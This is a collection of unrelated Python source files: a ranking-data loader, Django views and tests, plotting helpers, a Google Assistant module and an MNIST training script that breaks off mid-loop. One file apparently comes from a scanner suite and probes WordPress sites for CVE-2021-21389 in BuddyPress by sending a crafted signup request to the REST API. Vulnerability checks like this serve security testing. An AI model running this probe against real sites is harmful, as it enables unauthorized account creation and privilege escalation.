  def max_query_size(self):
    """Largest query document list over the three splits."""
    return np.amax((
        self.train.max_query_size(),
        self.validation.max_query_size(),
        self.test.max_query_size(),
      ),)

  def data_ready(self):
    """True once read_data() has populated the splits."""
    return self._data_ready

  def clean_data(self):
    """Free the memory held by the three splits."""
    del self.train
    del self.validation
    del self.test
    self._data_ready = False
    gc.collect()

  def _read_file(self, path, feat_map, purge):
    '''
    Read a file in LETOR (svmlight-like) format:
    "<label> qid:<qid> <feat_id>:<value> ... # comment" per document line,
    documents of the same query on consecutive lines.

    Args:
      path: file to parse.
      feat_map: dict mapping raw feature ids to column indices; extended
        in place so that all splits share one mapping.
      purge: drop queries that have no document with a positive label.

    Returns:
      (query_ranges, feature_matrix, label_vector) for the whole file.
    '''
    queries = []
    cur_docs = []
    cur_labels = []
    current_qid = None

    def _flush_query():
      # Normalize (per query) and store the documents collected so far.
      stacked_documents = np.stack(cur_docs, axis=0)
      if self.feature_normalization:
        stacked_documents -= np.amin(stacked_documents, axis=0)[None, :]
        safe_max = np.amax(stacked_documents, axis=0)
        safe_max[safe_max == 0] = 1.  # avoid division by zero on constant columns
        stacked_documents /= safe_max[None, :]
      np_labels = np.array(cur_labels, dtype=np.int64)
      # Optionally drop queries without any relevant document.
      if not purge or np.any(np.greater(np_labels, 0)):
        queries.append(
          {
            'qid': current_qid,
            'n_docs': stacked_documents.shape[0],
            'labels': np_labels,
            'documents': stacked_documents
          }
        )

    for line in open(path, 'r'):
      info = line[:line.find('#')].split()
      if not info:
        # Robustness: skip blank or comment-only lines.
        continue
      qid = info[1].split(':')[1]
      label = int(info[0])
      feat_pairs = info[2:]
      if current_qid is None:
        current_qid = qid
      elif current_qid != qid:
        _flush_query()
        current_qid = qid
        cur_docs = []
        cur_labels = []
      doc_feat = np.zeros(self._num_nonzero_feat)
      for pair in feat_pairs:
        feat_id, feature = pair.split(':')
        feat_id = int(feat_id)
        feat_value = float(feature)
        if feat_id not in feat_map:
          feat_map[feat_id] = len(feat_map)
          assert feat_map[feat_id] < self._num_nonzero_feat, '%s features found but %s expected' % (feat_map[feat_id], self._num_nonzero_feat)
        doc_feat[feat_map[feat_id]] = feat_value
      cur_docs.append(doc_feat)
      cur_labels.append(label)
    # Bug fix: flush the final query of the file, which was previously
    # dropped because it never triggered a qid change.
    if cur_docs:
      _flush_query()
    all_docs = np.concatenate([x['documents'] for x in queries], axis=0)
    all_n_docs = np.array([x['n_docs'] for x in queries], dtype=np.int64)
    all_labels = np.concatenate([x['labels'] for x in queries], axis=0)
    query_ranges = _add_zero_to_vector(np.cumsum(all_n_docs))
    return query_ranges, all_docs, all_labels

  def _create_feature_mapping(self, feature_dict):
    """Assign consecutive column indices to the given raw feature ids."""
    total_features = 0
    feature_map = {}
    for fid in feature_dict:
      if fid not in feature_map:
        feature_map[fid] = total_features
        total_features += 1
    return feature_map

  def _normalize_feat(self, query_ranges, feature_matrix):
    """Min-max normalize *feature_matrix* per query, in place.

    Returns a boolean vector marking columns that vary in at least one
    query (i.e. are not constant everywhere).
    """
    non_zero_feat = np.zeros(feature_matrix.shape[1], dtype=bool)
    for qid in range(query_ranges.shape[0]-1):
      s_i, e_i = query_ranges[qid:qid+2]
      cur_feat = feature_matrix[s_i:e_i,:]
      min_q = np.amin(cur_feat, axis=0)
      max_q = np.amax(cur_feat, axis=0)
      cur_feat -= min_q[None, :]
      denom = max_q - min_q
      denom[denom == 0.] = 1.  # constant columns stay zero instead of NaN
      cur_feat /= denom[None, :]
      non_zero_feat += np.greater(max_q, min_q)
    return non_zero_feat

  def read_data(self):
    """
    Reads data from a fold folder (letor format).

    Loads from the cached pickle when allowed and up to date; otherwise
    parses the raw files, normalizes and filters features, and (optionally)
    writes a fresh pickle.  Populates self.train/.validation/.test.
    """
    data_read = False
    # Pickle name encodes the preprocessing flags so caches don't mix.
    if self.feature_normalization and self.purge_test_set:
      pickle_name = 'binarized_purged_querynorm.npz'
    elif self.feature_normalization:
      pickle_name = 'binarized_querynorm.npz'
    elif self.purge_test_set:
      pickle_name = 'binarized_purged.npz'
    else:
      pickle_name = 'binarized.npz'
    pickle_path = self.data_path + pickle_name
    train_raw_path = self.data_path + 'train.txt'
    valid_raw_path = self.data_path + 'vali.txt'
    test_raw_path = self.data_path + 'test.txt'
    if self.read_from_pickle and os.path.isfile(pickle_path):
      loaded_data = np.load(pickle_path, allow_pickle=True)
      # Only trust caches written by the current format version.
      if loaded_data['format_version'] == FOLDDATA_WRITE_VERSION:
        feature_map = loaded_data['feature_map'].item()
        train_feature_matrix = loaded_data['train_feature_matrix']
        train_doclist_ranges = loaded_data['train_doclist_ranges']
        train_label_vector = loaded_data['train_label_vector']
        valid_feature_matrix = loaded_data['valid_feature_matrix']
        valid_doclist_ranges = loaded_data['valid_doclist_ranges']
        valid_label_vector = loaded_data['valid_label_vector']
        test_feature_matrix = loaded_data['test_feature_matrix']
        test_doclist_ranges = loaded_data['test_doclist_ranges']
        test_label_vector = loaded_data['test_label_vector']
        data_read = True
      del loaded_data
    if not data_read:
      feature_map = {}
      (train_doclist_ranges,
       train_feature_matrix,
       train_label_vector) = self._read_file(train_raw_path,
                                             feature_map,
                                             False)
      (valid_doclist_ranges,
       valid_feature_matrix,
       valid_label_vector) = self._read_file(valid_raw_path,
                                             feature_map,
                                             False)
      (test_doclist_ranges,
       test_feature_matrix,
       test_label_vector) = self._read_file(test_raw_path,
                                            feature_map,
                                            self.purge_test_set)
      assert len(feature_map) == self._num_nonzero_feat, '%d non-zero features found but %d expected' % (len(feature_map), self._num_nonzero_feat)
      if self.feature_normalization:
        # Normalize every split; keep only columns that vary in train.
        non_zero_feat = self._normalize_feat(train_doclist_ranges,
                                             train_feature_matrix)
        self._normalize_feat(valid_doclist_ranges,
                             valid_feature_matrix)
        self._normalize_feat(test_doclist_ranges,
                             test_feature_matrix)
        list_map = [x[0] for x in sorted(feature_map.items(), key=lambda x: x[1])]
        filtered_list_map = [x for i, x in enumerate(list_map) if non_zero_feat[i]]
        feature_map = {}
        for i, x in enumerate(filtered_list_map):
          feature_map[x] = i
        train_feature_matrix = train_feature_matrix[:, non_zero_feat]
        valid_feature_matrix = valid_feature_matrix[:, non_zero_feat]
        test_feature_matrix = test_feature_matrix[:, non_zero_feat]
      # sort found features so that feature id ascends
      sorted_map = sorted(feature_map.items())
      transform_ind = np.array([x[1] for x in sorted_map])
      train_feature_matrix = train_feature_matrix[:, transform_ind]
      valid_feature_matrix = valid_feature_matrix[:, transform_ind]
      test_feature_matrix = test_feature_matrix[:, transform_ind]
      feature_map = {}
      for i, x in enumerate([x[0] for x in sorted_map]):
        feature_map[x] = i
      if self.store_pickle_after_read:
        np.savez_compressed(pickle_path,
            format_version = FOLDDATA_WRITE_VERSION,
            feature_map = feature_map,
            train_feature_matrix = train_feature_matrix,
            train_doclist_ranges = train_doclist_ranges,
            train_label_vector = train_label_vector,
            valid_feature_matrix = valid_feature_matrix,
            valid_doclist_ranges = valid_doclist_ranges,
            valid_label_vector = valid_label_vector,
            test_feature_matrix = test_feature_matrix,
            test_doclist_ranges = test_doclist_ranges,
            test_label_vector = test_label_vector,
          )
    n_feat = len(feature_map)
    assert n_feat == self.num_features, '%d features found but %d expected' % (n_feat, self.num_features)
    # feature_map: raw id -> column; self.feature_map: column -> raw id.
    self.inverse_feature_map = feature_map
    self.feature_map = [x[0] for x in sorted(feature_map.items(), key=lambda x: x[1])]
    self.train = DataFoldSplit(self,
                               'train',
                               train_doclist_ranges,
                               train_feature_matrix,
                               train_label_vector)
    self.validation = DataFoldSplit(self,
                               'validation',
                               valid_doclist_ranges,
                               valid_feature_matrix,
                               valid_label_vector)
    self.test = DataFoldSplit(self,
                              'test',
                              test_doclist_ranges,
                              test_feature_matrix,
                              test_label_vector)
    self._data_ready = True
|
python
|
from django.test import TestCase
from django.urls import reverse
from .models import Post
# Create your tests here.
class PostModelTest(TestCase):
    """Checks that Post fields round-trip through the database."""

    def setUp(self):
        Post.objects.create(title='Mavzu', text='yangilik matni')

    def test_text_content(self):
        post = Post.objects.get(id=1)
        self.assertEqual(f'{post.title}', 'Mavzu')
        self.assertEqual(f'{post.text}', 'yangilik matni')
class HomePageViewTest(TestCase):
    """Exercises the home page URL, its route name, and its template."""

    def setUp(self):
        Post.objects.create(title='Mavzu 2', text='boshqa yangilik')

    def test_views_url_exists_at_proper_location(self):
        self.assertEqual(self.client.get('/').status_code, 200)

    def test_view_url_by_name(self):
        self.assertEqual(self.client.get(reverse('home')).status_code, 200)

    def test_view_uses_correct_template(self):
        response = self.client.get(reverse('home'))
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'home.html')
|
python
|
from django.shortcuts import render, redirect, get_object_or_404
from .models import BlogPost as blog
from .models import Comment
from .forms import CreateCommentForm, UpdateCommentForm
# Create your views here.
def post_view(request):
    """Render the blog main page with every BlogPost."""
    return render(request, 'blog/main.html', {'qs': blog.objects.all()})
def detail_blog_view(request, slug):
    """
    Show a single blog post with its comments and handle new-comment POSTs.

    Anonymous visitors can read the post, but the comment form is neither
    shown ('visible' is False) nor processed for them.
    """
    blog_post = get_object_or_404(blog, slug=slug)
    user = request.user
    context = {
        'blog_post': blog_post,
        'comments': Comment.objects.filter(blog=blog_post),
        'visible': user.is_authenticated,
        'user': user.username,
    }
    form = CreateCommentForm(request.POST or None, request.FILES or None)
    # Bug fix: only authenticated users may create comments; previously the
    # form was validated and saved even for anonymous visitors, attaching
    # AnonymousUser as the comment author.
    if user.is_authenticated and form.is_valid():
        obj = form.save(commit=False)
        obj.blog = blog_post
        obj.author = user
        obj.save()
        form = CreateCommentForm()  # present a fresh, empty form after saving
    context['form'] = form
    return render(request, 'blog/detail_blog.html', context)
def update_comment_view(request, id):
    """
    Edit an existing comment.

    GET: show the form pre-filled with the current comment body.
    POST: save the edit and redirect back to the comment's blog post;
    on validation failure re-render the bound form with its errors.
    """
    com = get_object_or_404(Comment, id=id)
    if request.POST:
        form = UpdateCommentForm(request.POST or None, request.FILES or None, instance=com)
        if form.is_valid():
            # Fix: removed the pointless form.initial reassignment before
            # save() and the leftover debug print of the comment body.
            form.save()
            return redirect('/blog1/' + com.blog.slug)
    else:
        # Pre-fill the form with the current comment text.
        form = UpdateCommentForm(initial={'body': com.body})
    return render(request, "blog/edit_comment.html", {'form': form})
|
python
|
from pyflink.common import ExecutionMode, RestartStrategies
from pyflink.common.serialization import JsonRowDeserializationSchema
from pyflink.common.typeinfo import Types
from pyflink.dataset import ExecutionEnvironment
from pyflink.datastream import StreamExecutionEnvironment, CheckpointingMode, ExternalizedCheckpointCleanup, TimeCharacteristic, RocksDBStateBackend
from pyflink.datastream.connectors import FlinkKafkaConsumer
def demo01():
    """Guided tour of the PyFlink StreamExecutionEnvironment API.

    Notes/demo function: shows dependency management, sources,
    checkpointing and buffer-timeout configuration.  Uses placeholder
    paths/hosts, so it is not meant to run as-is.
    """
    # Create an execution environment representing the current program:
    # a local environment when started locally, a cluster environment
    # when submitted to a cluster.
    env = StreamExecutionEnvironment.get_execution_environment()
    # Add URLs to the classpath of every user-code classloader.  Paths must
    # carry a protocol (e.g. file://) and be reachable from all nodes.
    env.add_classpaths("file://lib")
    # Add jar files uploaded to the cluster and referenced by the job.
    # Equivalent to .set_string("pipeline.jars", 'file://' + dir_kafka_sql_connect)
    env.add_python_archive("py_env.zip") if False else None  # noqa
|
python
|
import sys
import os
from bs4 import BeautifulSoup
import markdown
"""
将 Markdown 转换为 HTML
"""
class MarkdownToHtml:
headTag = '<head><meta charset="utf-8" /></head>'
def __init__(self,cssFilePath = None):
if cssFilePath != None:
self.genStyle(cssFilePath)
def genStyle(self,cssFilePath):
with open(cssFilePath,'r') as f:
cssString = f.read()
self.headTag = self.headTag[:-7] + '<style type="text/css">{}</style>'.format(cssString) + self.headTag[-7:]
def markdownToHtml(self, sourceFilePath, destinationDirectory = None, outputFileName = None):
if not destinationDirectory:
# 未定义输出目录则将源文件目录(注意要转换为绝对路径)作为输出目录
destinationDirectory = os.path.dirname(os.path.abspath(sourceFilePath))
if not outputFileName:
# 未定义输出文件名则沿用输入文件名
outputFileName = os.path.splitext(os.path.basename(sourceFilePath))[0] + '.html'
if destinationDirectory[-1] != '/':
destinationDirectory += '/'
with open(sourceFilePath,'r', encoding='utf8') as f:
markdownText = f.read()
# 编译出原始 HTML 文本
rawHtml = self.headTag + markdown.markdown(markdownText,output_format='html5')
# 格式化 HTML 文本为可读性更强的格式
beautifyHtml = BeautifulSoup(rawHtml,'html5lib').prettify()
with open(destinationDirectory + outputFileName, 'w', encoding='utf8') as f:
f.write(beautifyHtml)
if __name__ == "__main__":
mth = MarkdownToHtml()
# 做一个命令行参数列表的浅拷贝,不包含脚本文件名
argv = sys.argv[1:]
# 目前列表 argv 可能包含源文件路径之外的元素(即选项信息)
# 程序最后遍历列表 argv 进行编译 markdown 时,列表中的元素必须全部是源文件路径
outputDirectory = None
if '-s' in argv:
cssArgIndex = argv.index('-s') +1
cssFilePath = argv[cssArgIndex]
# 检测样式表文件路径是否有效
if not os.path.isfile(cssFilePath):
print('Invalid Path: '+cssFilePath)
sys.exit()
mth.genStyle(cssFilePath)
# pop 顺序不能随意变化
argv.pop(cssArgIndex)
argv.pop(cssArgIndex-1)
if '-o' in argv:
dirArgIndex = argv.index('-o') +1
outputDirectory = argv[dirArgIndex]
# 检测输出目录是否有效
if not os.path.isdir(outputDirectory):
print('Invalid Directory: ' + outputDirectory)
sys.exit()
# pop 顺序不能随意变化
argv.pop(dirArgIndex)
argv.pop(dirArgIndex-1)
# 至此,列表 argv 中的元素均是源文件路径
# 遍历所有源文件路径
for filePath in argv:
# 判断文件路径是否有效
if os.path.isfile(filePath):
mth.markdownToHtml(filePath, outputDirectory)
else:
print('Invalid Path: ' + filePath)
|
python
|
import math
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import matplotlib.transforms as mtransforms
from mpl_toolkits.axes_grid.anchored_artists import AnchoredText
def setup_axes(diff=False):
fig = plt.figure()
axes = []
if diff:
gs = gridspec.GridSpec(2, 1, height_ratios=[2,1])
main_axis = plt.subplot(gs[0])
axes.append(plt.subplot(gs[0]))
axes.append(plt.subplot(gs[1], sharex=main_axis))
else:
axes.append(plt.subplot())
return fig, axes
def layout_main_and_diff_axis(fig, axes):
main_axis, diff_axis = axes
fig.subplots_adjust(hspace=0.0)
main_axis.spines['bottom'].set_visible(False)
plt.setp(main_axis.get_xticklabels(), visible=False)
main_axis.set_xlabel('')
diff_axis.xaxis.tick_bottom()
def configure_legend_on_axis(axis, title='', loc='best', borderpad=1.2, draws_background=True):
legend = axis.legend(loc=loc,
title=title,
borderaxespad=borderpad,
framealpha=0.8,
frameon=draws_background,
fancybox=draws_background)
legend.get_frame().set_color((0.96,0.96,0.96))
for line in legend.get_lines():
line.set_alpha(1.0)
def add_annotation_on_axis(axis, annotation, loc='upper right', borderpad=1.2):
codes = {'upper right': 1, 'upper left': 2, 'lower left': 3, 'lower right': 4,
'right': 5, 'center left': 6,'center right': 7,
'lower center': 8, 'upper center': 9, 'center': 10}
at = AnchoredText(annotation,
codes[loc],
frameon=False,
borderpad=borderpad,
prop=dict(linespacing=2.5))
axis.add_artist(at)
def get_major_ticks_within_view_interval(axis):
interval = axis.get_view_interval()
ticks_in_view_interval = []
for tick, loc in zip(axis.get_major_ticks(),
axis.get_major_locator()()):
if mtransforms.interval_contains(interval, loc):
ticks_in_view_interval.append(tick)
return ticks_in_view_interval
def set_figure_size_with_width(width):
params = {'figure.figsize': figure_size_from_width(width)}
plt.rcParams.update(params)
def figure_size_from_width(width):
"""Returns a single plot figure size in inches given a width in points"""
inches_per_point = 1.0/72.27
golden_mean = (math.sqrt(5)-1.0)/2.0
inches_width = width * inches_per_point
fig_height = inches_width*golden_mean
return [inches_width,fig_height]
|
python
|
from rest_framework import serializers
from polyclinics.models import Poly
class PolySerializer(serializers.ModelSerializer):
class Meta:
model = Poly
fields = '__all__'
|
python
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''BuddyPress REST API Privilege Escalation to RCE''',
"description": '''The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE''',
"severity": "high",
"references": [
"https://github.com/HoangKien1020/CVE-2021-21389",
"https://buddypress.org/2021/03/buddypress-7-2-1-security-release/",
"https://codex.buddypress.org/releases/version-7-2-1/",
"https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2021-21389",
"cwe-id": "CWE-863"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2021", "wordpress", "wp-plugin", "rce"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/wp-json/buddypress/v1/signup"""
method = "POST"
data = """{
"user_login":"{{randstr}}",
"password":"{{randstr}}",
"user_name":"{{randstr}}",
"user_email":"{{randstr}}@example.com"
}"""
headers = {'Content-Type': 'application/json; charset=UTF-8'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp0.status_code == 200) and ("""application/json""" in str(resp0.headers)) and ("""user_login""" in resp0.text and """registered""" in resp0.text and """activation_key""" in resp0.text and """user_email""" in resp0.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
python
|
#!/usr/bin/env python
# Copyright (C) 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os.path
from resources.lib.utils import import_or_install, json, PlayerMetaData, PLATFORM, PLAYING_STATES, PLAYING_STATE, LISTENING_STATE, IDLE_STATE, NOTIFY_STATE, ALERT_STATE, SPEAKING_STATE
import threading
import sys
try:
FileNotFoundError
except NameError:
FileNotFoundError = IOError
def setup(monitor):
'''setup the module'''
if not "armv7" in PLATFORM:
LOGGER.warning("unsupported platform! %s" % PLATFORM)
return False
enabled = monitor.config.get("ENABLE_MODULE_GOOGLE_ASSISTANT", False)
if not enabled:
LOGGER.debug("Google Assistant module is not enabled!")
return False
dummy_mic = "Dummy" in monitor.config["ALSA_CAPTURE_DEVICE"]
mute_mic = monitor.config.get("GOOGLE_ASSISTANT_MUTE_MIC", dummy_mic)
import_or_install("pathlib2", "pathlib", installpip="pathlib2")
import_or_install("google.assistant.library", "Assistant", True, installpip="google-assistant-library google-assistant-sdk[samples]", installapt="portaudio19-dev libffi-dev libssl-dev")
import_or_install("google.assistant.library.event", "EventType", True, installpip="google-assistant-sdk[samples]")
import_or_install("google.assistant.library.file_helpers", "existing_file", True, installpip="google-assistant-sdk[samples]")
import_or_install("google.assistant.library.device_helpers", "register_device", True, installpip="google-assistant-sdk[samples]")
import_or_install("google.oauth2.credentials", "Credentials", True, installpip="google-auth-oauthlib[tool]")
model_id="voice-kit-208321-voice-kit-kftedd"
project_id="voice-kit-208321"
client_secrets = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..","resources", "googlecreds.json")
credentialsfile = None
devconfig_file = None
return GoogleAssistantPlayer(credentialsfile, model_id, project_id, devconfig_file, client_secrets, monitor, mute_mic)
class GoogleAssistantPlayer(threading.Thread):
_exit = threading.Event()
_assistant = None
def command(self, cmd, cmd_data=None):
if not self._assistant:
return False
if self.monitor.states["google_assistant"]["state"] == PLAYING_STATE:
if cmd == "pause":
self._assistant.send_text_query("pause")
return True
elif cmd == "stop":
self._assistant.send_text_query("stop")
return True
else:
return False
elif cmd == "broadcast":
self._assistant.send_text_query("broadcast %s" % cmd_data)
return True
else:
return False
def process_event(self, event):
"""Pretty prints events.
Prints all events that occur with two spaces between each new
conversation and a single space between turns of a conversation.
Args:
event(event.Event): The current event to process.
"""
LOGGER.debug("Google received event: %s" % event)
if event.type == EventType.ON_START_FINISHED:
LOGGER.info("Google Assistant is now ready for commands (waiting for hotword)")
self._assistant.send_text_query("set volume to 100 percent")
elif event.type in [EventType.ON_CONVERSATION_TURN_STARTED]:
self.monitor.states["google_assistant"]["state"] = LISTENING_STATE
self.monitor.command("system", "ping")
LOGGER.info("Google Assistant is now listening for a command (hotword detected)")
elif event.type in [EventType.ON_ALERT_STARTED]:
self.monitor.states["google_assistant"]["state"] = ALERT_STATE
LOGGER.info("Google Assistant is now broadcasting an alert")
elif event.type == EventType.ON_RENDER_RESPONSE:
self.monitor.states["google_assistant"]["title"] = event.args.get("text","")
elif event.type in [EventType.ON_RESPONDING_STARTED]:
self.monitor.states["google_assistant"]["state"] = SPEAKING_STATE
LOGGER.info("Google Assistant is talking a response")
elif event.type in [EventType.ON_MEDIA_TRACK_PLAY]:
self.monitor.states["google_assistant"]["state"] = PLAYING_STATE
LOGGER.info("Google Assistant is playing media")
elif event.type in [EventType.ON_ALERT_FINISHED,
EventType.ON_CONVERSATION_TURN_TIMEOUT,
EventType.ON_RESPONDING_FINISHED,
EventType.ON_MEDIA_TRACK_STOP,
EventType.ON_CONVERSATION_TURN_FINISHED]:
# check for follow-up
if event.type == EventType.ON_CONVERSATION_TURN_FINISHED:
if event.args and event.args['with_follow_on_turn']:
# the mic is listening again for follow-up
self.monitor.states["google_assistant"]["state"] = LISTENING_STATE
return
# return to idle
self.monitor.states["google_assistant"]["state"] = IDLE_STATE
elif event.type == EventType.ON_DEVICE_ACTION:
for command, params in event.actions:
LOGGER.info("Do command %s - with params: %s" % (command, params))
def authenticate_device(self):
import google_auth_oauthlib.flow
scopes = ["https://www.googleapis.com/auth/assistant-sdk-prototype", "https://www.googleapis.com/auth/gcm"]
self.monitor.config["GOOGLE_ASSISTANT_AUTH_CODE"] = ""
flow = google_auth_oauthlib.flow.InstalledAppFlow.from_client_secrets_file(
self.client_secrets,
scopes=scopes
)
flow.redirect_uri = flow._OOB_REDIRECT_URI
auth_url, _ = flow.authorization_url()
LOGGER.info("######################################################################################")
LOGGER.info("# Registering Google Assistant #")
LOGGER.info('# Please visit the url below in your browser and #')
LOGGER.info('# paste the resulting code in the web configuration #')
LOGGER.info('# There will be a new setting added, called "GOOGLE ASSISTANT AUTH CODE" #')
LOGGER.info('# #')
LOGGER.info(' ')
LOGGER.info(' %s' % auth_url)
LOGGER.info(' ')
LOGGER.info("######################################################################################")
self.monitor.states["messages"].append("Google Assistant needs to be registered. See the log for details.")
code = None
while not code and not self._exit.is_set():
code = self.monitor.config["GOOGLE_ASSISTANT_AUTH_CODE"]
if code:
flow.fetch_token(code=code)
LOGGER.info("Device is registered succesfully!")
self.monitor.config["GOOGLE_ASSISTANT_AUTH_CODE"] = ""
creds = flow.credentials
creds_data = {
'token': creds.token,
'refresh_token': creds.refresh_token,
'token_uri': creds.token_uri,
'client_id': creds.client_id,
'client_secret': creds.client_secret,
'scopes': creds.scopes
}
del creds_data['token']
config_path = os.path.dirname(self.credentialsfile)
if not os.path.isdir(config_path):
os.makedirs(config_path)
with open(self.credentialsfile, 'w') as outfile:
json.dump(creds_data, outfile)
LOGGER.debug("Credentials saved to %s" % self.credentialsfile)
def __init__(self, credentialsfile=None, model_id=None, project_id=None, devconfig_file=None, client_secrets=None, monitor=None, mic_muted=False):
if not credentialsfile:
credentialsfile = os.path.join(os.path.expanduser('~/.config'), 'google-oauthlib-tool','credentials.json')
self.credentialsfile = credentialsfile
if not devconfig_file:
devconfig_file = os.path.join(os.path.expanduser('~/.config'), 'googlesamples-assistant','device_config_library.json')
device_model_id = None
last_device_id = None
try:
with open(devconfig_file) as f:
device_config = json.load(f)
device_model_id = device_config['model_id']
last_device_id = device_config.get('last_device_id', None)
except FileNotFoundError:
LOGGER.warning("device config file not found")
if not model_id and not device_model_id:
raise Exception('Missing --device-model-id option')
# Re-register if "device_model_id" is given by the user and it differs
# from what we previously registered with.
should_register = (
model_id and model_id != device_model_id)
self.device_model_id = model_id or device_model_id
self.devconfig_file = devconfig_file
self.last_device_id = last_device_id
self.project_id = project_id
self.should_register = should_register
self.mic_muted = mic_muted
self.monitor = monitor
self.client_secrets = client_secrets
if monitor:
self.monitor.states["google_assistant"] = PlayerMetaData("Google Assistant")
threading.Thread.__init__(self)
def stop(self):
self._exit.set()
if self._assistant:
self._assistant.send_text_query("exit")
threading.Thread.join(self, 2)
def run(self):
if not os.path.isfile(self.credentialsfile):
# we should authenticate
self.authenticate_device()
if not os.path.isfile(self.credentialsfile):
return
with open(self.credentialsfile, 'r') as f:
self.credentials = Credentials(token=None, **json.load(f))
with Assistant(self.credentials, self.device_model_id) as assistant:
events = assistant.start()
assistant.set_mic_mute(self.mic_muted)
device_id = assistant.device_id
LOGGER.info('device_model_id: %s' % self.device_model_id)
LOGGER.info('device_id: %s' % device_id)
self._assistant = assistant
# Re-register if "device_id" is different from the last "device_id":
if self.should_register or (device_id != self.last_device_id):
if self.project_id:
register_device(self.project_id, self.credentials,
self.device_model_id, device_id)
pathlib.Path(os.path.dirname(self.devconfig_file)).mkdir(exist_ok=True)
with open(self.devconfig_file, 'w') as f:
json.dump({
'last_device_id': device_id,
'model_id': self.device_model_id,
}, f)
else:
LOGGER.error("Device is not registered!")
for event in events:
if self._exit.is_set():
return
self.process_event(event)
|
python
|
import time
# only required to run python3 examples/cvt_arm.py
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
from torchvision import datasets, transforms
from torch.utils.data import Dataset
import os
import math
import numpy as np
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
batch_size = 64 # batch size in every epoch
class CustomDataset(Dataset):
    """In-memory dataset over parallel data/target sequences.

    Optional `transform` / `target_transform` callables are applied to the
    sample and the label respectively on each access.
    """

    def __init__(self, data, targets, transform=None, target_transform=None):
        self.data = data
        self.targets = targets
        self.transform = transform
        self.target_transform = target_transform

    def __len__(self):
        return len(self.targets)

    def __getitem__(self, idx):
        sample = self.data[idx]
        label = self.targets[idx]
        if self.transform is not None:
            sample = self.transform(sample)
        if self.target_transform is not None:
            label = self.target_transform(label)
        return sample, label
# MNIST with the standard per-channel mean/std normalization constants.
# download=False assumes the data is already present under data/.
train_dataset = datasets.MNIST(root = 'data/', train=True, download=False,
                               transform=transforms.Compose([
                                   transforms.ToTensor(),
                                   transforms.Normalize((0.1307,), (0.3081,))
                               ]))
# training set
train_loader = torch.utils.data.DataLoader(train_dataset,
                                           batch_size=batch_size,
                                           shuffle=True,
                                           num_workers=4,
                                           drop_last=True)
test_dataset = datasets.MNIST(root = 'data/', train=False, download=False,
                              transform=transforms.Compose([
                                  transforms.ToTensor(),
                                  transforms.Normalize((0.1307,), (0.3081,))
                              ]))
# test set
test_loader = torch.utils.data.DataLoader(test_dataset,
                                          batch_size=100,
                                          shuffle=True,
                                          num_workers=4,
                                          drop_last=False)
# Pre-generated L0 "invariance" adversarial examples plus the labels humans
# assigned to them; used below to measure "robust" accuracy.
inv_adv_examples = np.load("invariance_examples/final_l0/inv_adv_examples.npy") # visualize this for sanity check
human_labels = np.load("invariance_examples/final_l0/human_labels.npy")
inv_eg_dataset = CustomDataset(data=inv_adv_examples,
                               targets=human_labels,
                               transform=transforms.Compose([
                                   transforms.ToTensor(),
                                   transforms.Normalize((0.1307,), (0.3081,))
                               ]))
inv_eg_dataloader = torch.utils.data.DataLoader(inv_eg_dataset,
                                                batch_size=10,
                                                shuffle=True,
                                                num_workers=4,
                                                drop_last=False)
class MLP(nn.Module):
    """Two-layer perceptron for flattened 28x28 MNIST digits (784 -> 20 -> 10).

    forward() returns per-class log-probabilities (log_softmax over dim 1).
    """

    def __init__(self, input_size=784, output_size=10):
        super(MLP, self).__init__()
        self.fc1 = nn.Linear(input_size, 20)
        self.fc2 = nn.Linear(20, output_size)

    def forward(self, x):
        # Flatten (N, 1, 28, 28) images to (N, 784).
        x = x.view(-1, 28 * 28)
        x = F.relu(self.fc1(x))
        # BUGFIX: the output layer must NOT pass through ReLU before
        # log_softmax -- clamping logits to >= 0 erases negative class
        # scores and cripples training.
        x = self.fc2(x)
        return F.log_softmax(x, dim=1)
model = MLP()
model = model.to(device)
epochs = 100
# specify loss function
# NOTE(review): CrossEntropyLoss expects raw logits, but MLP.forward
# returns log_softmax output -- confirm the double log-softmax is intended.
criterion = nn.CrossEntropyLoss()
# specify optimizer
optimizer = torch.optim.SGD(model.parameters(), lr=0.1)
model.train() # prep model for training
# Per-epoch accuracy histories: standard test set vs. invariance examples.
standard_acc_arr = []
robust_acc_arr = []
for epoch in range(epochs):
    ###################
    # train the model #
    ###################
    # BUGFIX: model.eval() below was never undone, so every epoch after the
    # first trained with the model stuck in eval mode; re-enable train mode
    # at the top of each epoch.
    model.train()
    # monitor training loss
    train_loss = 0.0
    for data, target in train_loader:
        data, target = data.to(device), target.to(device)
        # clear the gradients of all optimized variables
        optimizer.zero_grad()
        # forward pass: compute predicted outputs by passing inputs to the model
        output = model(data)
        # calculate the loss
        loss = criterion(output, target)
        # backward pass: compute gradient of the loss with respect to model parameters
        loss.backward()
        # perform a single optimization step (parameter update)
        optimizer.step()
        # update running training loss
        train_loss += loss.item()*data.size(0)
    #--------------------------------------------------------------------------------------
    # Standard test-set accuracy, tracked per class.
    class_correct = list(0. for i in range(10))
